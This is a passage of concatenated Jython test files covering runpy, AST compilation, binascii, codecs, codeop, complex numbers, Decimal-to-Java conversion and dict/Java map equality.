self._check_script(script_dir, "<run_path>", script_name,
script_dir, '')
def test_directory_compiled(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
os.remove(script_name)
self._check_script(script_dir, "<run_path>", compiled_name,
script_dir, '')
def test_directory_error(self):
with temp_dir() as script_dir:
mod_name = 'not_main'
script_name = self._make_test_script(script_dir, mod_name)
msg = "can't find '__main__' module in %r" % script_dir
self._check_import_error(script_dir, msg)
def test_zipfile(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
self._check_script(zip_name, "<run_path>", fname, zip_name, '')
def test_zipfile_compiled(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', compiled_name)
self._check_script(zip_name, "<run_path>", fname, zip_name, '')
def test_zipfile_error(self):
with temp_dir() as script_dir:
mod_name = 'not_main'
script_name = self._make_test_script(script_dir, mod_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
msg = "can't find '__main__' module in %r" % zip_name
self._check_import_error(zip_name, msg)
def test_main_recursion_error(self):
with temp_dir() as script_dir, temp_dir() as dummy_dir:
mod_name = '__main__'
source = ("import runpy\n"
"runpy.run_path(%r)\n") % dummy_dir
script_name = self._make_test_script(script_dir, mod_name, source)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
msg = "recursion depth exceeded"
self.assertRaisesRegexp(RuntimeError, msg, run_path, zip_name)
def test_main():
run_unittest(RunModuleCodeTest, RunModuleTest, RunPathTest)
if __name__ == "__main__":
test_main()
```
#### File: test/bugs/pr149.py
```python
import java
class Foo(java.io.Serializable):
def init(self):
pass
```
#### File: test/bugs/pr192.py
```python
def test1():
'Test function 1'
pass
def test2(a, b=2, c=3):
pass
attrs = dir(test1)[:]
for attr in ['__doc__', '__name__', 'func_code', 'func_defaults',
'func_doc', 'func_globals', 'func_name']:
attrs.remove(attr)
assert not attrs
assert test1.__doc__ == test1.func_doc == 'Test function 1'
assert test1.__name__ == test1.func_name == 'test1'
assert test1.func_code
assert test1.func_defaults is None
assert test1.func_globals == globals()
assert test2.func_defaults == (2, 3)
co = test2.func_code
attrs = dir(co)[:]
for attr in ['co_name', 'co_argcount', 'co_varnames', 'co_filename',
'co_firstlineno', 'co_flags']:
attrs.remove(attr)
##assert not attrs
flags = 0x4 | 0x8
assert co.co_name == 'test2'
assert co.co_argcount == 3
assert co.co_varnames == ('a', 'b', 'c')
assert co.co_filename
assert co.co_firstlineno
assert (co.co_flags & flags) == 0
def test3(a, *args, **kw):
pass
assert (test3.func_code.co_flags & flags) == flags
class Foo:
def method(self):
"""This is a method"""
pass
attrs = dir(Foo.method)[:]
for attr in ['im_self', 'im_func', 'im_class', '__doc__', '__name__']:
attrs.remove(attr)
assert not attrs
assert Foo.method.im_self is None
assert Foo.method.im_class == Foo
assert Foo.method.im_func
assert Foo.method.im_func.__name__ == Foo.method.__name__
assert Foo.method.im_func.__doc__ == Foo.method.__doc__
f = Foo()
m = f.method
assert m.im_self == f
assert m.im_class == Foo
assert m.im_func == Foo.method.im_func
assert m.__name__ == Foo.method.__name__
assert m.__doc__ == Foo.method.__doc__
class Baz:
pass
try:
m.im_class = Baz
assert 0
except TypeError:
pass
try:
m.im_stuff = 7
assert 0
except AttributeError:
pass
```
#### File: test/bugs/pr208.py
```python
def test(x):
return x
assert 7 == apply(test, (7,))
assert 7 == apply(test, (), {'x': 7})
try:
apply(test, (1,), 7)
print 'TypeError expected'
except TypeError:
pass
try:
apply(test, (1,), {7:3})
print 'TypeError expected'
except TypeError:
pass
try:
apply(test, (1,), None)
print 'TypeError expected'
except TypeError:
pass
```
#### File: Lib/test/test_ast_jy.py
```python
import unittest
import ast
from test import test_support
def srcExprToTree(source, kind='exec'):
return compile(source, '<module>', kind, ast.PyCF_ONLY_AST)
class TestCompile(unittest.TestCase):
def test_compile_ast(self):
node = srcExprToTree("1/2")
compile(node, "<string>", 'exec')
def test_alias_trim(self):
node = srcExprToTree("import os. path")
self.assertEquals(node.body[0].names[0].name, "os.path")
node = srcExprToTree("import os .path")
self.assertEquals(node.body[0].names[0].name, "os.path")
node = srcExprToTree("import os . path")
self.assertEquals(node.body[0].names[0].name, "os.path")
def test_cmpop(self):
expr = srcExprToTree('a < b < c', 'eval')
compare = expr.body
self.assert_(isinstance(compare.ops[0], ast.Lt))
self.assert_(isinstance(compare.comparators[0], ast.Name))
self.assert_(isinstance(compare.ops[1], ast.Lt))
self.assert_(isinstance(compare.comparators[1], ast.Name))
self.assert_(isinstance(compare.ops[1:][0], ast.Lt))
self.assert_(isinstance(compare.comparators[1:][0], ast.Name))
z = zip( compare.ops[1:], compare.comparators[1:])
self.assert_(isinstance(z[0][0], ast.Lt))
self.assert_(isinstance(z[0][1], ast.Name))
def test_empty_init(self):
# Jython 2.5.0 did not allow empty constructors for many ast node types
# but CPython ast nodes do allow this. For the moment, I don't see a
# reason to allow construction of the super types (like ast.AST and
# ast.stmt) as well as the op types that are implemented as enums in
# Jython (like boolop), but I've left them in but commented out for
# now. We may need them in the future since CPython allows this, but
# it may fall under implementation detail.
#ast.AST()
ast.Add()
ast.And()
ast.Assert()
ast.Assign()
ast.Attribute()
ast.AugAssign()
ast.AugLoad()
ast.AugStore()
ast.BinOp()
ast.BitAnd()
ast.BitOr()
ast.BitXor()
ast.BoolOp()
ast.Break()
ast.Call()
ast.ClassDef()
ast.Compare()
ast.Continue()
ast.Del()
ast.Delete()
ast.Dict()
ast.Div()
ast.Ellipsis()
ast.Eq()
ast.Exec()
ast.Expr()
ast.Expression()
ast.ExtSlice()
ast.FloorDiv()
ast.For()
ast.FunctionDef()
ast.GeneratorExp()
ast.Global()
ast.Gt()
ast.GtE()
ast.If()
ast.IfExp()
ast.Import()
ast.ImportFrom()
ast.In()
ast.Index()
ast.Interactive()
ast.Invert()
ast.Is()
ast.IsNot()
ast.LShift()
ast.Lambda()
ast.List()
ast.ListComp()
ast.Load()
ast.Lt()
ast.LtE()
ast.Mod()
ast.Module()
ast.Mult()
ast.Name()
ast.Not()
ast.NotEq()
ast.NotIn()
ast.Num()
ast.Or()
ast.Param()
ast.Pass()
ast.Pow()
ast.Print()
ast.RShift()
ast.Raise()
ast.Repr()
ast.Return()
ast.Slice()
ast.Store()
ast.Str()
ast.Sub()
ast.Subscript()
ast.Suite()
ast.TryExcept()
ast.TryFinally()
ast.Tuple()
ast.UAdd()
ast.USub()
ast.UnaryOp()
ast.While()
ast.With()
ast.Yield()
ast.alias()
ast.arguments()
#ast.boolop()
#ast.cmpop()
ast.comprehension()
#ast.excepthandler()
#ast.expr()
#ast.expr_context()
ast.keyword()
#ast.mod()
#ast.operator()
#ast.slice()
#ast.stmt()
#ast.unaryop()
#==============================================================================
def test_main(verbose=None):
test_classes = [TestCompile]
test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main(verbose=True)
```
#### File: Lib/test/test_binascii_jy.py
```python
from test import test_support
from test.test_binascii import BinASCIITest
import unittest
import binascii
class UnicodeBinASCIITest(BinASCIITest):
type2test = unicode
# Create binary test data, but only 7-bit data to survive implicit unicode to str conversion.
rawdata = "The quick brown fox jumps over the lazy dog.\r\n"
rawdata += "".join(map(chr, xrange(128)))
rawdata += "\r\nHello world.\n"
def test_base64invalid(self):
# Test base64 with random invalid characters sprinkled throughout.
# This is a copy of BinASCIITest.test_base64invalid with 256 changed to 128 where we
# generate "fillers".
# Creating the modified test reveals a latent bug in the test as written, which is that the
# padding character "=" is/was inserted as a filler. In the original test, the location of
# that is harmless. With the change 256 to 128, it causes early termination of the
# a2b_base64 conversion (both CPython and Jython). We therefore make padding a valid
# character, excluding it from the fillers.
MAX_BASE64 = 57
lines = []
for i in range(0, len(self.data), MAX_BASE64):
b = self.type2test(self.rawdata[i:i+MAX_BASE64])
a = binascii.b2a_base64(b)
lines.append(a)
fillers = ""
valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
valid += "=" # pad character also valid
for i in xrange(128): # not 256 as in BinASCIITest.test_base64invalid
c = chr(i)
if c not in valid:
fillers += c
def addnoise(line):
noise = fillers
ratio = len(line) // len(noise)
res = ""
while line and noise:
if len(line) // len(noise) > ratio:
c, line = line[0], line[1:]
else:
c, noise = noise[0], noise[1:]
res += c
return res + noise + line
res = ""
for line in map(addnoise, lines):
a = self.type2test(line)
b = binascii.a2b_base64(a)
res += b
self.assertEqual(res, self.rawdata)
# Test base64 with just invalid characters, which should return
# empty strings. TBD: shouldn't it raise an exception instead ?
self.assertEqual(binascii.a2b_base64(self.type2test(fillers)), '')
def test_main():
test_support.run_unittest(UnicodeBinASCIITest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_codecs_jy.py
```python
import subprocess
import sys
import unittest
from test import test_support
class CodecsTestCase(unittest.TestCase):
def test_print_sans_lib(self):
# Encode and decode using utf-8 in an environment without the standard
# library, to check that a utf-8 codec is always available. See:
# http://bugs.jython.org/issue1458
subprocess.call([sys.executable, "-J-Dpython.cachedir.skip=true",
"-S", # No site module: avoid codec registry initialised too soon
test_support.findfile('print_sans_lib.py')])
def test_string_escape_1502(self):
# http://bugs.jython.org/issue1502
self.assertEqual('\\x00'.encode('string-escape'), '\\\\x00')
self.assertEqual('\\x00'.encode('unicode-escape'), '\\\\x00')
def test_main():
test_support.run_unittest(CodecsTestCase)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_codeop_jy.py
```python
import codeop
import unittest
from test import test_support
from test.test_support import run_unittest
def compile_(source,name="<input>",symbol="single"):
return compile(source,name,symbol)
class CompileTests(unittest.TestCase):
def assertValid(self, str, symbol='single',values=None,value=None):
'''succeed iff str is a valid piece of code'''
code = compile_(str, "<input>", symbol)
if values:
d = {}
exec code in d
del d['__builtins__']
self.assertEquals(d,values)
elif value is not None:
self.assertEquals(eval(code,self.eval_d),value)
else:
self.assert_(code)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
compile_(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assert_(is_syntax)
except OverflowError:
self.assert_(not is_syntax)
def test_valid(self):
av = self.assertValid
# Failed for Jython 2.5a2. See http://bugs.jython.org/issue1116.
# For some reason this tests fails when run from test_codeops#test_valid
# when run from Jython (works in CPython).
av("@a.b.c\ndef f():\n pass")
# These tests pass on Jython, but fail on CPython. Will need to investigate
# to decide if we need to match CPython.
av("\n\n")
av("# a\n")
av("\n\na = 1\n\n",values={'a':1})
av("\n\nif 1: a=1\n\n",values={'a':1})
av("def x():\n pass\n ")
av("def x():\n pass\n ")
av("#a\n\n \na=3\n",values={'a':3})
av("def f():\n pass\n#foo")
# these tests fail in Jython in test_codeop.py because PythonPartial.g
# erroneously allows them through. Once that is fixed, these tests
# can be deleted.
def test_invalid(self):
ai = self.assertInvalid
ai("del 1")
ai("del ()")
ai("del (1,)")
ai("del [1]")
ai("del '1'")
ai("[i for i in range(10)] = (1, 2, 3)")
def test_main():
run_unittest(CompileTests)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_complex_jy.py
```python
import math
import operator
import os
import re
import unittest
from test import test_support
INF, NINF, NAN = map(float, ("inf", "-inf", "nan"))
class ComplexTest(unittest.TestCase):
def test_dunder_coerce(self):
self.assertEqual(complex.__coerce__(1+1j, None), NotImplemented)
self.assertRaises(TypeError, complex.__coerce__, None, 1+2j)
def test_pow(self):
class Foo(object):
def __rpow__(self, other):
return other ** 2
# regression in 2.5 alphas
self.assertEqual((4+0j) ** Foo(), (16+0j))
def test___nonzero__(self):
self.assertTrue(0.25+0j)
self.assertTrue(25j)
def test_abs_big(self):
# These are close to overflow but don't
close = [ complex( 1.794e+308, 0.000e+00),
complex( 1.119e+308, 1.403e+308),
complex(-3.992e+307, 1.749e+308),
complex(-1.617e+308, 7.785e+307),
complex(-1.617e+308,-7.785e+307),
complex(-3.992e+307,-1.749e+308) ]
# These are a little bigger and do overflow
over = [ complex( 1.130e+308, 1.417e+308),
complex(-4.032e+307, 1.767e+308),
complex(-1.633e+308, 7.863e+307),
complex(-1.633e+308,-7.863e+307),
complex(-4.032e+307,-1.767e+308) ]
# If you start with infinity, the return is infinity, no overflow
infinities = [ complex(INF, 1), complex(NINF, 2), complex(3, INF), complex(4, NINF) ]
for z in close :
self.assertAlmostEquals(abs(z), 1.794e+308, delta=0.01e+308)
for z in over :
self.assertRaises(OverflowError, abs, z)
for z in infinities :
self.assertEqual(abs(z), INF)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
class ComplexArithmeticTest(unittest.TestCase):
def almostEqual(self, a, b):
if a == b: # also accounts for infinities
return True
return abs(a - b) < 0.0000000001
def assertComplexEqual(self, x, y):
self.assertTrue(
(self.almostEqual(x.real, y.real) or (math.isnan(x.real) and math.isnan(y.real))) and \
(self.almostEqual(x.imag, y.imag) or (math.isnan(x.imag) and math.isnan(y.imag))),
"expected %r != actual %r" % (x, y))
def test_complex_arithmetic(self):
"""Verify *, /, +, - on representative complex numbers results in the same values as in CPython"""
# Verifies fix for http://bugs.jython.org/issue2460
re_comment = re.compile("^(\s*)\#")
with open(data_file("complex_arithmetic.txt")) as f:
for line in f:
if re_comment.match(line):
continue
op, a, b, result = line.split()
if result == "ZeroDivisionError":
self.assertRaises(ZeroDivisionError, getattr(operator, op), complex(a), complex(b))
else:
self.assertComplexEqual(complex(result), getattr(operator, op)(complex(a), complex(b)))
def test_main():
test_support.run_unittest(ComplexTest, ComplexArithmeticTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_decimal_jy.py
```python
import unittest
from test import test_support
from decimal import Decimal
from java.lang import Float, Double, Object
from java.math import BigDecimal
class TestJavaDecimal(unittest.TestCase):
def test_decimal(self):
x = Decimal("1.1")
y = x.__tojava__(BigDecimal)
self.assertTrue(isinstance(y, BigDecimal))
def test_object(self):
x = Decimal("1.1")
y = x.__tojava__(Object)
self.assertTrue(isinstance(y, BigDecimal))
def test_float(self):
x = Decimal("1.1")
y = x.__tojava__(Float)
self.assertTrue(isinstance(y, Float))
def test_double(self):
x = Decimal("1.1")
y = x.__tojava__(Double)
self.assertTrue(isinstance(y, Double))
if __name__ == '__main__':
unittest.main()
```
#### File: Lib/test/test_dict_jy.py
```python
from test import test_support
import unittest
import UserDict
from collections import defaultdict
import test_dict
from java.util import HashMap, LinkedHashMap, Hashtable
from java.util.concurrent import ConcurrentHashMap
from org.python.core import PyStringMap as stringmap
class DictInitTest(unittest.TestCase):
def testInternalSetitemInInit(self):
"""Test for http://jython.org/bugs/1816134
CPython's dict uses an internal setitem method to initialize itself
rather than the one on its subclasses, and this tests that Jython does
as well.
"""
class Subdict(dict):
def __init__(self):
super(Subdict, self).__init__([('a',1)])
self.createdInInit = 1
def __setitem__(self, key, value):
super(Subdict, self).__setitem__(key, value)
assert hasattr(self, 'createdInInit')
self.createdInInit = value
s = Subdict()
s[7] = 'called'
self.assertEquals('called', s.createdInInit)
def testUnhashableKeys(self):
try:
a = {[1]:2}
except TypeError:
pass
else:
self.fail("list as dict key should raise TypeError")
try:
a = {{1:2}:3}
except TypeError:
pass
else:
self.fail("dict as dict key should raise TypeError")
class DictCmpTest(unittest.TestCase):
"Test for http://bugs.jython.org/issue1031"
def testDictCmp(self):
# 'Implicit' comparision of dicts against other types instances
# shouldn't raise exception:
self.assertNotEqual({}, '')
# The same, but explicitly calling __cmp__ should raise TypeError:
self.assertRaises(TypeError, {}.__cmp__, '')
def testDictDerivedCmp(self):
# With derived classes that doesn't override __cmp__, the behaviour
# should be the same that with dicts:
class derived_dict(dict): pass
self.assertEqual(derived_dict(), {})
self.assertNotEqual(derived_dict(), '')
self.assertRaises(TypeError, derived_dict().__cmp__, '')
# But, if they *override* __cmp__ and raise TypeError from there, we
# have exception raised when checking for equality...
class non_comparable_dict(dict):
def __cmp__(self, other):
raise TypeError, "I always raise TypeError"
self.assertRaises(TypeError, lambda: non_comparable_dict() == '')
self.assertRaises(TypeError, non_comparable_dict().__cmp__, '')
# ...unless you compare it with other dicts:
# self.assertEqual(non_comparable_dict(), {})
# The same happens even if the overridden __cmp__ doesn't nothing apart
# from calling super:
class dummy_dict_with_cmp(dict):
def __cmp__(self, other):
return super(dummy_dict_with_cmp, self).__cmp__(other)
self.assertEqual(dummy_dict_with_cmp(), {})
# But TypeError is raised when comparing against other types
self.assertRaises(TypeError, lambda: dummy_dict_with_cmp() == '')
self.assertRaises(TypeError, dummy_dict_with_cmp().__cmp__, '')
# Finally, the Python implementation shouldn't be tricked by not
# implementing __cmp__ on the actual type of the dict-derived instance,
# but implementing it on a superclass.
class derived_dict_with_custom_cmp(dict):
def __cmp__(self, other):
return 0
class yet_another_dict(derived_dict_with_custom_cmp): pass
self.assertEqual(derived_dict_with_custom_cmp(), '')
self.assertEqual(yet_another_dict(), '')
class DictMiscTest(unittest.TestCase):
def test_pop_key_error(self):
# tests http://bugs.jython.org/issue2247
with self.assertRaisesRegexp(KeyError, r"^1$"):
{}.pop(1)
with self.assertRaisesRegexp(KeyError, r"^\(\)$"):
{}.pop(())
with self.assertRaisesRegexp(KeyError, r"^frozenset\(\[\]\)$"):
{}.pop(frozenset())
class DerivedDictTest(unittest.TestCase):
"Tests for derived dict behaviour"
def test_raising_custom_key_error(self):
class CustomKeyError(KeyError):
pass
class DerivedDict(dict):
def __getitem__(self, key):
raise CustomKeyError("custom message")
self.assertRaises(CustomKeyError, lambda: DerivedDict()['foo'])
def test_issue1676(self):
#See http://bugs.jython.org/issue1676
x=defaultdict()
#This formerly caused an NPE.
self.assertEqual(None, x.pop(None,None))
def test_big_dict(self):
"""Verify that fairly large collection literals of primitives can be constructed."""
# use \n to separate to avoid parser problems
d = eval("{" + ",\n".join(("'key{}': {}".format(x, x) for x in xrange(16000))) +"}")
self.assertEqual(len(d), 16000)
self.assertEqual(sum(d.itervalues()), 127992000)
class JavaIntegrationTest(unittest.TestCase):
"Tests for instantiating dicts from Java maps and hashtables"
type2test = HashMap
def test_map(self):
x = self.type2test()
x.put('a', 1)
x.put('b', 2)
x.put('c', 3)
x.put((1,2), "xyz")
y = dict(x)
self.assertEqual(set(y.items()), set([('a', 1), ('b', 2), ('c', 3), ((1,2), "xyz")]))
def test_map_builtin_pymethods(self):
x = self.type2test()
x['a'] = 1
x[(1, 2)] = 'xyz'
self.assertEqual({tup for tup in x.iteritems()}, {('a', 1), ((1, 2), 'xyz')})
self.assertEqual({tup for tup in x.itervalues()}, {1, 'xyz'})
self.assertEqual({tup for tup in x.iterkeys()}, {'a', (1, 2)})
self.assertEqual(str(x), repr(x))
self.assertEqual(type(str(x)), type(repr(x)))
def test_equal(self):
for d in ({}, {1:2}):
x = self.type2test(d)
self.assertEqual(x, d)
self.assertEqual(d, x)
self.assertEqual(x, HashMap(d))
def test_remove(self):
x = self.type2test({'a': 1})
del x['a']
self.assertEqual(x, {})
x = self.type2test({})
with self.assertRaises(KeyError):
del x[0]
def test_equality_empty_dict(self):
jmap = self.type2test()
self.assertTrue(jmap == {})
self.assertTrue({} == jmap)
def test_equality_simple_dict(self):
jmap = self.type2test()
self.assertFalse({'a': 1} == jmap)
self.assertFalse(jmap == {'a': 1})
def test_equality_mixed_types_dict(self):
ref = {False:0, 'a':1, u'b':2L, 3:"3"}
alt = {0:False, u'a':True, 'b':2, 3:"3"}
self.assertEqual(ref, alt) # test assumption
jref = self.type2test(ref)
for v in [ref, alt, jref]:
self.assertTrue(jref == v)
self.assertTrue(v == jref)
self.assertTrue(jref == self.type2test(v))
self.assertTrue(self.type2test(v) == jref)
alt1 = ref.copy(); alt1['a'] = 2;
alt2 = ref.copy(); del alt2['a'];
alt3 = ref.copy(); alt3['c'] = [];
for v in [alt1, alt2, alt3, {}]:
self.assertFalse(jref == v)
self.assertFalse(v == jref)
self.assertFalse(jref == self.type2test(v))
self.assertFalse(self.type2test(v) == jref)
# Test for http://bugs.jython.org/issue2639
# This is to test the != comparisons between Java and Python maps/dict
def test_inequality_empty_dict(self):
jmap = self.type2test()
self.assertFalse(jmap != {})
self.assertFalse({} != jmap)
def test_inequality_simple_dict(self):
jmap = self.type2test()
self.assertTrue(jmap != {'a': 1})
self.assertTrue({'a': 1} != jmap)
def test_inequality_mixed_types_dict(self):
ref = {False:0, 'a':1, u'b':2L, 3:"3"}
alt = {0:False, u'a':True, 'b':2, 3:"3"}
self.assertEqual(ref, alt) # test assumption
jref = self.type2test(ref)
for v in [ref, alt, jref]:
self.assertFalse(jref != v)
self.assertFalse(v != jref)
self.assertFalse(jref != self.type2test(v))
self.assertFalse(self.type2test(v) != jref)
alt1 = ref.copy(); alt1['a'] = 2;
alt2 = ref.copy(); del alt2['a'];
alt3 = ref.copy(); alt3['c'] = [];
for v in [alt1, alt2, alt3, {}]:
self.assertTrue(jref != v)
self.assertTrue(v != jref)
self.assertTrue(jref != self.type2test(v))
self.assertTrue(self.type2test(v) != jref)
class JavaHashMapTest(JavaIntegrationTest):
type2test = HashMap
class JavaLinkedHashMapTest(JavaIntegrationTest):
type2test = LinkedHashMap
class JavaHashtableTest(JavaIntegrationTest):
type2test = Hashtable
class JavaConcurrentHashMapTest(JavaIntegrationTest):
type2test = ConcurrentHashMap
class JavaDictTest(test_dict.DictTest):
# Extend Python standard tests for dict. (Also used for Map proxies.)
type2test = dict
def test_copy_java_hashtable(self):
x = Hashtable()
xc = x.copy()
self.assertEqual(type(x), type(xc))
def test_repr_value_None(self):
x = self.type2test({1:None})
self.assertEqual(repr(x), '{1: None}')
def test_set_return_None(self):
x = self.type2test({1:2})
self.assertEqual(x.__setitem__(1, 3), None)
self.assertEqual(x.__getitem__(1), 3)
def test_del_return_None(self):
x = self.type2test({1:2})
self.assertEqual(x.__delitem__(1), None)
self.assertEqual(len(x), 0)
def assert_property(self, prop, a, b):
prop(self._make_dict(a), self._make_dict(b))
prop(a, self._make_dict(b))
prop(self._make_dict(a), b)
def assert_not_property(self, prop, a, b):
with self.assertRaises(AssertionError):
prop(self._make_dict(a), self._make_dict(b))
with self.assertRaises(AssertionError):
prop(a, self._make_dict(b))
with self.assertRaises(AssertionError):
prop(self._make_dict(a), b)
def test_list_equality(self):
class A(dict): pass
d = {'a':1, u'\xe7':2, u'\U00010842':3, 42:None}
for dtype in (dict, self.type2test, A):
self.assertEquals([dtype()], [dict()])
self.assertEquals([dtype(d)], [d])
# Some variants with unicode keys
def test_repr_unicode(self):
d = self._make_dict({})
d[u'3\uc6d4'] = 2
self.assertEqual(repr(d), "{u'3\\uc6d4': 2}")
d = self._make_dict({})
d[2] = u'\u039c\u03ac\u03c1\u03c4\u03b9\u03bf\u03c2'
self.assertEqual(repr(d), "{2: u'\\u039c\\u03ac\\u03c1\\u03c4\\u03b9\\u03bf\\u03c2'}")
d = self._make_dict({})
d[u'\uc6d4'] = d
self.assertEqual(repr(d), "{u'\\uc6d4': {...}}")
def test_fromkeys_unicode(self):
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842', u'\u1810'),
{u'\U00010840':u'\u1810', u'\U00010841':u'\u1810', u'\U00010842':u'\u1810'})
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842'),
{u'\U00010840':None, u'\U00010841':None, u'\U00010842':None})
# NOTE: when comparing dictionaries below exclusively in Java
# space, keys like 1 and 1L are different objects. Only when they
# are brought into Python space by Py.java2py, as is needed when
# comparing a Python dict with a Java Map, do we see them become
# equal.
def test_le(self):
self.assert_property(self.assertLessEqual, {}, {})
self.assert_property(self.assertLessEqual, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertLessEqual(self._make_dict({1: 2}), {1L: 2L, 3L: 4L})
self.assertLessEqual({1L: 2L}, self._make_dict({1: 2, 3L: 4L}))
def test_lt(self):
self.assert_not_property(self.assertLess, {}, {})
self.assert_not_property(self.assertLess, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertLess(self._make_dict({1: 2}), {1L: 2L, 3L: 4L})
self.assertLess({1L: 2L}, self._make_dict({1: 2, 3L: 4L}))
def test_ge(self):
self.assert_property(self.assertGreaterEqual, {}, {})
self.assert_property(self.assertGreaterEqual, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertGreaterEqual(self._make_dict({1: 2, 3: 4}), {1L: 2L})
self.assertGreaterEqual({1L: 2L, 3L: 4L}, self._make_dict({1: 2}))
def test_gt(self):
self.assert_not_property(self.assertGreater, {}, {})
self.assert_not_property(self.assertGreater, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertGreater(self._make_dict({1: 2, 3: 4}), {1L: 2L})
self.assertGreater({1L: 2L, 3L: 4L}, self._make_dict({1: 2}))
class NullAcceptingDictTest(JavaDictTest):
# Extension of Java Map proxy tests to cases where the underlying
# container is able to accept nulls. Same tests as for dict (mostly).
def test_missing(self):
# Proxy map types are not expected to support __missing__.
self.assertFalse(hasattr(self.type2test, "__missing__"))
self.assertFalse(hasattr(self._make_dict({}), "__missing__"))
def test_fromkeys(self):
# Adapted from test_dict.DictTest.test_fromkeys by removal of test
# sub-classes since this does not work with proxy types.
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc'), d)
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
class NullRejectingDictTest(NullAcceptingDictTest):
# Adaptation of Java Map proxy tests to cases where the underlying
# container cannot accept nulls, therefore None cannot be stored.
def test_reject_none(self):
d = self._make_dict({'a': 1})
with self.assertRaises(ValueError):
d['a'] = None
with self.assertRaises(ValueError):
d['b'] = None
# There is no __init__ or __new__ we can customise, so raises NullPointerException.
# self.assertRaises(ValueError, self._make_dict, {'c': None})
self.assertRaises(ValueError, d.update, {'c': None})
with self.assertRaises(ValueError):
d.update(c=None)
self.assertRaises(ValueError, d.fromkeys, 'cde')
self.assertRaises(ValueError, d.fromkeys, 'cde', None)
def test_list_equality(self):
class A(dict): pass
d = {'a':1, u'\xe7':2, u'\U00010842':3, 42:True}
for dtype in (dict, self.type2test, A):
self.assertEquals([dtype()], [dict()])
self.assertEquals([dtype(d)], [d])
@unittest.skip("not relevant since cannot hold None.")
def test_repr_value_None(self): pass
def test_fromkeys(self):
# Adapted from test_dict.DictTest.test_fromkeys avoiding None
# (except as test) and by removal of test sub-classing.
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc', 42), {'a':42, 'b':42, 'c':42})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3, 42)
self.assertRaises(ValueError, self._make_dict({}).fromkeys, 'abc', None)
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc', 42), d)
self.assertEqual(d.fromkeys('abc', 42), {'a':42, 'b':42, 'c':42})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([], 42), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g(), 42), {1:42})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3, 42)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
def test_fromkeys_unicode(self):
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842', u'\u1810'),
{u'\U00010840':u'\u1810', u'\U00010841':u'\u1810', u'\U00010842':u'\u1810'})
def test_setdefault(self):
# Adapted from test_dict.DictTest.test_setdefault avoiding None
d = self._make_dict({'key0': False})
d.setdefault('key0', [])
self.assertIs(d.setdefault('key0'), False)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
self.assertRaises(TypeError, d.setdefault)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.setdefault, x, [])
@unittest.skip("See bjo #2746. Java keys() returns an Enumerator.")
def test_has_key(self): pass # defining here only so we can skip it
@unittest.skip("See bjo #2746. Java keys() returns an Enumerator.")
def test_keys(self): pass # defining here only so we can skip it
class PyStringMapDictTest(test_dict.DictTest):
# __dict__ for objects uses PyStringMap for historical reasons, so
# we have to test separately
type2test = stringmap
def test_missing(self):
Dict = self.type2test
# Make sure dict doesn't have a __missing__ method
self.assertFalse(hasattr(Dict, "__missing__"))
self.assertFalse(hasattr(self._make_dict({}), "__missing__"))
# PyStringMap is not expected to support __missing__ as it cannot be sub-classed.
# At least, it wasn't added when it was added to PyDictionary.
def test_fromkeys(self):
